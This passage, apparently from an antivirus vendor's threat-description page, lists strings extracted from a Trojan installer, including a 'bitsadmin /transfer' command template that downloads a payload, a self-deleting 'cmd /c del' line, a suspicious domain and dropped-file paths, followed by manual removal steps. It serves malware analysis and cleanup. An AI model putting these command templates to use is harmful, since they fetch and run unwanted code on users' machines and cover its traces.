<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Mon Nov 21 09:30:06 2016
0%0x0
9!:=:_:}:
88
0%0 020@0
1$1-161}1
>#>'> >/>3>7>;>
3M4
: :@:\:`:
2 2<2@2`2
2$2,242@2
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
version.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
secularistsarakolet.site

sevensetup.exe_2504:

64*46%*56
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
NaËD
FtpCommandW
Filename: %s
MSVCRT.dll
HttpSendRequestW
HttpSendRequestExW
HttpQueryInfoW
FtpCreateDirectoryW
FtpOpenFileW
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpOpenRequestW
HttpEndRequestW
InternetCrackUrlW
WININET.dll
inetc.dll
6%6S6v6~6
)5;80432
1#:9865%
dpb.fy`]
dpb.fy` @
dpb.fy` @_[
db.fy` _[
db.fy _[
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp\586a26122a99c_ua.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp\inetc.dll
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
Wwininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp
nsjCF32.tmp
Exec: command="C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp\586a26122a99c_ua.exe"
p\nsjCF32.tmp\inetc.dll"
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp
"C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp
sevensetup.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsdCF11.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Setup__2140_il2.exe:292
    LF4X4VJWFp.exe:2880
    cpSetup.exe:1852

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\main[1].htm (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A2LCUZKZ.txt (106 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1V9Q60HH.txt (106 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (6539 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\amipb[1].htm (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (7551 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\amipb[1].htm (271 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\main[1].htm (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe (5293 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\586abfc3362cc[1].exe (3920 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\System.dll (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\U6cgvnDPb5 (192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A0B.tmp (1568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\nsArray.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\cpSetup.exe (93723 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe (58164 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\706703874 (974 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now